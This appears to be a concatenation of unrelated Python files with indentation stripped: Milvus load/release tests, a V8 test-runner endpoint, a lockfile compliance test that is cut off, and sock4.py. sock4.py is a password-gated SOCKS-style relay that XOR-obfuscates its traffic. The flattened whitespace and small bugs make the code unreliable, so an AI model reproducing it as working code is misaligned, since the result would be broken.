@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.load_collection(collection)
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
res = connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during droping index
method: insert, create index and flush, load collection, do release collection during droping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
|
endpoint.py
|
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os
import Queue
import threading
import time
from ..local import execution
from ..local import progress
from ..local import testsuite
from ..local import utils
from ..server import compression
class EndpointProgress(progress.ProgressIndicator):
def __init__(self, sock, server, ctx):
super(EndpointProgress, self).__init__()
self.sock = sock
self.server = server
self.context = ctx
self.results_queue = [] # Accessors must synchronize themselves.
self.sender_lock = threading.Lock()
self.senderthread = threading.Thread(target=self._SenderThread)
self.senderthread.start()
def HasRun(self, test, has_unexpected_output):
# The runners that call this have a lock anyway, so this is safe.
self.results_queue.append(test)
def _SenderThread(self):
keep_running = True
tests = []
self.sender_lock.acquire()
while keep_running:
time.sleep(0.1)
# This should be "atomic enough" without locking :-)
# (We don't care which list any new elements get appended to, as long
# as we don't lose any and the last one comes last.)
current = self.results_queue
self.results_queue = []
for c in current:
if c is None:
keep_running = False
else:
tests.append(c)
if keep_running and len(tests) < 1:
continue # Wait for more results.
if len(tests) < 1: break # We're done here.
result = []
for t in tests:
result.append(t.PackResult())
try:
compression.Send(result, self.sock)
except:
self.runner.terminate = True
for t in tests:
self.server.CompareOwnPerf(t, self.context.arch, self.context.mode)
tests = []
self.sender_lock.release()
def Execute(workspace, ctx, tests, sock, server):
suite_paths = utils.GetSuitePaths(os.path.join(workspace, "test"))
suites = []
for root in suite_paths:
suite = testsuite.TestSuite.LoadTestSuite(
os.path.join(workspace, "test", root))
if suite:
suite.SetupWorkingDirectory()
suites.append(suite)
suites_dict = {}
for s in suites:
suites_dict[s.name] = s
s.tests = []
for t in tests:
suite = suites_dict[t.suite]
t.suite = suite
suite.tests.append(t)
suites = [ s for s in suites if len(s.tests) > 0 ]
for s in suites:
s.DownloadData()
progress_indicator = EndpointProgress(sock, server, ctx)
runner = execution.Runner(suites, progress_indicator, ctx)
try:
runner.Run(server.jobs)
except IOError, e:
if e.errno == 2:
message = ("File not found: %s, maybe you forgot to 'git add' it?" %
e.filename)
else:
message = "%s" % e
compression.Send([[-1, message]], sock)
progress_indicator.HasRun(None, None) # Sentinel to signal the end.
progress_indicator.sender_lock.acquire() # Released when sending is done.
progress_indicator.sender_lock.release()
|
sock4.py
|
import socket
import select
import socketserver
import logging
import json
#import http
from multiprocessing import Process
with open('config.json', 'rb') as f:
config = json.load(f)
#port = int(config['loaclport'])
serverdd = config['server']
port = int(config['port'])
pss = config['password']
key1 = int.from_bytes(pss[1].encode(),byteorder='big')
class UDPSocks5Server(socketserver.BaseRequestHandler):
def handle(self):
cop,sockd = self.request
#print(cop)
#UDPsocked = sockd
ccc = self.client_address
date=xorr(cop)
if(int(date[0])==1):
#转发入
oopd = int(date[1])
if(int(date[2:2+oopd]==pss.encode())):
nowdate = date[oopd+2:]
server11 = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
remote_port = int.from_bytes(nowdate[0:2], 'big')
datein = nowdate[2:]
#if datein == b'\x01\x02\x03\x04':
#print('ip information')
#sockd.sendto(b'\x03\x01',ccc)
#server11.sendto(len(ccc[0]).to_bytes(1, byteorder = 'big')+bytes(ccc[0],encoding = "utf8")+ccc[1].to_bytes(2, byteorder = 'big'),(('0.0.0.0'),remote_port))
#else:
#print('send-OK')
#print(datein)
#print(remote_port)
#server11.sendto(,(('0.0.0.0'),remote_port))
server11.bind(('127.0.0.1',0))
server11.sendto(server11.getsockname()[1].to_bytes(length=2,byteorder='big')+len(ccc[0]).to_bytes(1, byteorder = 'big')+bytes(ccc[0],encoding = "utf8")+ccc[1].to_bytes(2, byteorder = 'big')+datein,(('127.0.0.1'),remote_port))
#datey,user = server11.recvfrom(1024*100)
#sockd.sendto(datey,ccc)
server11.close()
#sockd.close()
if(int(date[0])==2):
#print('OK')
#print(date)
#转发出
#print(date)
lena=date[1]
#print(lena)
ipld=date[2:2+lena]
#print(ipld)
portld=date[2+lena]*256+date[3+lena]
#print(portld)
date=date[4+lena:]
#print(date)
date=xorr(date)
sockd.sendto(date,(ipld,portld))
#remote_ip=socket.inet_ntoa(date[1:5])
#remote_ip=socket.inet_ntoa(nowdate[0:4])
#remote_port=int.from_bytes(nowdate[4:6], 'big')
#print(remote_ip)
#print(remote_port)
#sendpp=nowdate[6:]
#print(sendpp)
#server11 = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
#server11.sendto(sendpp,(remote_ip,remote_port))
#reply = b'\x00\x00\x00\x01'
#data_s,server_addr1 = server11.recvfrom(1024*100)
#reply+=nowdate[0:6]+data_s
#cop = xorr(reply)
#sockd.sendto(cop,ccc)
#server11.close()
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class Socks5Server(socketserver.StreamRequestHandler):
def handle_tcp(self, client, remote):
try:
fds = [client,remote]
while True:
r,w,e = select.select(fds,[],[],5)
if client in r:
cli_data = client.recv(128)
#cli_data_de = cli_data
cli_data_de = xorr(cli_data)
if len(cli_data) <= 0:
break
result = send_all(remote, cli_data_de)
if result < len(cli_data):
logging.warn("Failed pipping all data to target!!!")
break
if remote in r:
remote_data = remote.recv(128)
#remote_data_en = remote_data
remote_data_en = xorr(remote_data)
if len(remote_data) <= 0:
break
result = send_all(client, remote_data_en)
if result < len(remote_data):
logging("Failed pipping all data to client!!!")
break
except Exception as e:
logging.error(e)
finally:
client.close()
remote.close()
def handle(self):
client = self.request
data=client.recv(1024)
#client.send(b'\x05\x00')
#client.recv(1000)
#client.send(b"\x05\x00\x00\x03" + socket.inet_aton("0.0.0.0") + (port).to_bytes(2, byteorder = 'big'))
if data[0] == 1:
print ("TCP methon")
if (data[2:2 + data[1]]) == pss.encode():
print ("Password is right")
remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print(data[2 + data[1]:3 + data[1]])
if data[2 + data[1]:3 + data[1]] == b'\x01' :
print("domain method")
yumingcode=data[4 + data[1]:4 + data[1] + data[data[1]+3]]
print(yumingcode)
#yuming=decode1(yumingcode,1)
yuming=xorr(yumingcode)
print(yuming)
tempip = socket.getaddrinfo(yuming, None)
remoteport = ord(data[4 + data[1] + data[data[1]+3]:5 + data[1] + data[data[1]+3]])*256+ord(data[5 + data[1] + data[data[1]+3]:6 + data[1] + data[data[1]+3]])
print(remoteport)
remoteip=tempip[-1][4][0]
print(remoteip)
else:
tempip = data[3 + data[1]:7 + data[1]]
remoteip= str(tempip[0]) +'\x2e'+ str(tempip[1]) +'\x2e'+ str(tempip[2]) + '\x2e'+ str(tempip[3])
remoteport = ord(data[7 + data[1]:8 + data[1]])*256+ord(data[8 + data[1]:9 + data[1]])
print(remoteip)
print(remoteport)
#print (remoteip[0][4][0])
#sock.send('\x03\x00')
remote.connect((remoteip, remoteport))
client.send(b'\x03\x00')
self.handle_tcp(client,remote)
if data[0] == 2:
print ("UDP methon")#BAND-
if (data[2:2 + data[1]]) == pss.encode():
print ("Password is right")
#ooo=data[2+data[1]:]
sockudp = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sockudp.bind(('0.0.0.0',0))
remoteudp = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
client.send(sockudp.getsockname()[1].to_bytes(length=2,byteorder='big'))#发送绑定端口
print('Bind in %d'% sockudp.getsockname()[1] )
#test= sockudp.recvfrom(1024*100)
#test=test[0]
#test1=test[0]
#backclient=test[1:test1+1]
#backclient=backclient.decode()
#backport=int.from_bytes(test[test1+1:], 'big')
#print(int.from_bytes(sockudp.recvfrom(1), 'big'))
#backclient=sockudp.revfrom(int.from_bytes(sockudp.recvfrom(1), 'big'))
#backport=sockudp.recvfrom(2)
#print(backclient)
#print(backport)
#print(sockudp.recvfrom(1).to_bytes(length=2,byteorder='big'))
#sockudp.recvfrom()
#backclient=sockudp.recvfrom(sockudp.recvfrom(1))
#backport=sockudp.recvfrom(2)
print("UDP-Hand-OK")
#sockudp.sendto(b'\x03\x01',(backclient,backport) )
try:
fds = [sockudp,remoteudp,client]
print(fds)
while True:
r,w,e = select.select(fds,[],[],1)
#print(r)
#print(w)
#print(e)
#if len(client.recv(1024))==0:
#print('Tcp-Udp End')
#break
for i in r:
if i is client:
#print('client disconnect')
if len(client.recv(1024))==0:
print('Tcp-Udp End')
remoteudp.close()
sockudp.close()
client.close()
break
if i is sockudp:
print('client->server->web')
jibadate,cccs = sockudp.recvfrom(1024)
print(jibadate)
#copo=jibadate[0]*256+jibadate[1]
cogpo = int.from_bytes(jibadate[0:2], 'big')
print(cogpo)
testdata = jibadate[2:]
print(testdata)
#lenddd = jibadate[0]
lenddd=testdata[0]
print(lenddd)
ipoposad=testdata[1:1+lenddd]
print(ipoposad)
portoposad=testdata[1+lenddd]*256+testdata[2+lenddd]
print(portoposad)
testdata=testdata[3+lenddd:]
#print(testdata)
#lenddd=testdata[0]
#sockdpp=testdata[1:1+lenddd]
#testdata=testdata[3+lenddd:]
#print(testdata)
#testdata = sockudp.recvfrom(1024 * 100)
udpdatein = testdata
udpdatein = udpdatein[4:]
ipgg=str(udpdatein[0]) +'\x2e'+ str(udpdatein[1]) +'\x2e'+ str(udpdatein[2]) + '\x2e'+ str(udpdatein[3])
print(ipgg)
portgg=udpdatein[4]*256+udpdatein[5]
print(portgg)
udpdatein=udpdatein[6:]
remoteudp.sendto(udpdatein,(ipgg,portgg))
#testdata = remoteudp.recvfrom(1024 * 100)
#udpdateout = testdata[0]
#lpo=testdata[1]
#udpdateout = b'\x00\x00\x00\x01'+socket.inet_aton(lpo[0])+lpo[1].to_bytes(length=2,byteorder='big',signed=False)+udpdateout
#coop= xorr(udpdateout)
#sockudp.sendto(coop,('127.0.0.1',cogpo))
#sockudp.sendto(coop,(backclient,backport))
if i is remoteudp:
print('web->server->client')
udpdateout,lpo = remoteudp.recvfrom(1024)
udpdateout = b'\x00\x00\x00\x01'+socket.inet_aton(lpo[0])+lpo[1].to_bytes(length=2,byteorder='big',signed=False)+udpdateout
udpdateout = b'\x02'+len(ipoposad).to_bytes(1, byteorder = 'big')+ipoposad+portoposad.to_bytes(2, byteorder = 'big')+udpdateout
coop= xorr(udpdateout)
sockudp.sendto(coop,('127.0.0.1',port))
#UDPsocked.sendto()
except Exception as e:
logging.error(e)
finally:
print('UDP Close Successfully')
client.close()
remoteudp.close()
sockudp.close()
#client.close()
#sockudp.close()
#remoteudp.close()
#ttt=xorr(ooo[1:])
#if ooo[0]==1:
#print('IP')
#tempip=ttt[0:4]
#remoteip= str(tempip[0]) +'\x2e'+ str(tempip[1]) +'\x2e'+ str(tempip[2]) + '\x2e'+ str(tempip[3])
#remoteport = ttt[4]*256 + ttt[5]
#mesg=ttt[6:]
#if ooo[0]==3:
#print('domain')
#len=ttt[0]
#yumingcode=data[1:2+len]
#ver,methods = client.recv(1),client.recv(1)
#methods = client.recv(ord(methods))
#client.send(b'\x05\x00')
#ver,cmd,rsv,atype = client.recv(1),client.recv(1),client.recv(1),client.recv(1)
#if ord(cmd) is not 1:
#client.close()
#return
# 判断是否支持atype,目前不支持IPv6
# 比特流转化成整型 big表示编码为大端法,
#if ord(atype) == 1:
# IPv4
#remote_addr = socket.inet_ntoa(client.recv(4))
#remote_port = int.from_bytes(client.recv(2), 'big')
#elif ord(atype) == 3:
# 域名
#addr_len = int.from_bytes(client.recv(1), byteorder = 'big')
#remote_addr = client.recv(addr_len)
#remote_port = int.from_bytes(client.recv(2), byteorder = 'big')
#else:
#不支持则关闭连接
#client.close()
#return
#remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#logging.info('[+] %s:%dConnect to --> %s:%d' % (self.client_address[0], self.client_address[1], remote_addr, remote_port))
#remote.connect((remote_addr, remote_port))
#reply = b"\x05\x00\x00\x01" + socket.inet_aton("0.0.0.0") + (2222).to_bytes(2, byteorder = 'big')
#client.send(reply)
def encode1(data,m):
q=""
for i in data:
tt=i^9
q=q+ chr( tt + 4 )
#q=q+chr(i^9)
j=q.encode()
if( m == 1 ):
return q
else:
return j
def decode1(data,m):
q = ""
for i in data:
tt = i -4
q=q+ chr( tt ^ 9)
#q=q+chr(i^9)
j=q.encode()
if( m == 1 ):
return q
else:
return j
def send_all(sock, data):
bytes_sent = 0
while True:
r = sock.send(data[bytes_sent:])
if r < 0:
return r
bytes_sent += r
if bytes_sent == len(data):
return bytes_sent
def xorr(data):
ddd=b''
for i in data:
ddd+= (i^key1).to_bytes(length=1,byteorder='big')
return ddd
def TCP():
server=socketserver.ThreadingTCPServer((serverdd,port),Socks5Server)
server.serve_forever()
if __name__ == '__main__':
try:
#http.test()
UDPshd = Process(target=TCP,)
UDPshd.start()
print("UDPrunning in :%d" % port)
#global UDPsocked
UDPserver = socketserver.ThreadingUDPServer((serverdd, port), UDPSocks5Server)
UDPserver.serve_forever()
print('[+] Lintening(UDP&TCP) on port:%d' % port)
#TCP ()
#print("[+] UDPrunning in :%d" % port)
#UDPserver = socketserver.ThreadingUDPServer((serverdd, port), UDPSocks5Server)
#UDPserver.serve_forever()
except Exception as e:
logging.error(e)
|
compliancetest.py
|
import os
import threading
import shutil
import lockfile
class ComplianceTest(object):
def __init__(self):
self.saved_class = lockfile.LockFile
def _testfile(self):
"""Return platform-appropriate file. Helper for tests."""
import tempfile
return os.path.join(tempfile.gettempdir(), 'trash-%s' % os.getpid())
def setup(self):
lockfile.LockFile = self.class_to_test
def teardown(self):
tf = self._testfile()
if os.path.isdir(tf):
shutil.rmtree(tf)
elif os.path.isfile(tf):
os.unlink(tf)
lockfile.LockFile = self.saved_class
def _test_acquire_helper(self, tbool):
# As simple as it gets.
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock.release()
assert not lock.is_locked()
def test_acquire_basic_threaded(self):
self._test_acquire_helper(True)
def test_acquire_basic_unthreaded(self):
self._test_acquire_helper(False)
def _test_acquire_no_timeout_helper(self, tbool):
# No timeout test
e1, e2 = threading.Event(), threading.Event()
t = _in_thread(self._lock_wait_unlock, e1, e2)
e1.wait() # wait for thread t to acquire lock
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
assert not lock2.i_am_locking()
try:
lock2.acquire(timeout=-1)
except lockfile.AlreadyLocked:
pass
else:
lock2.release()
raise AssertionError("did not raise AlreadyLocked in"
" thread %s" %
threading.current_thread().get_name())
e2.set() # tell thread t to release lock
t.join()
def test_acquire_no_timeout_threaded(self):
self._test_acquire_no_timeout_helper(True)
def test_acquire_no_timeout_unthreaded(self):
self._test_acquire_no_timeout_helper(False)
def _test_acquire_timeout_helper(self, tbool):
# Timeout test
e1, e2 = threading.Event(), threading.Event()
t = _in_thread(self._lock_wait_unlock, e1, e2)
e1.wait() # wait for thread t to acquire lock
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
try:
lock2.acquire(timeout=0.1)
except lockfile.LockTimeout:
pass
else:
lock2.release()
raise AssertionError("did not raise LockTimeout in thread %s" %
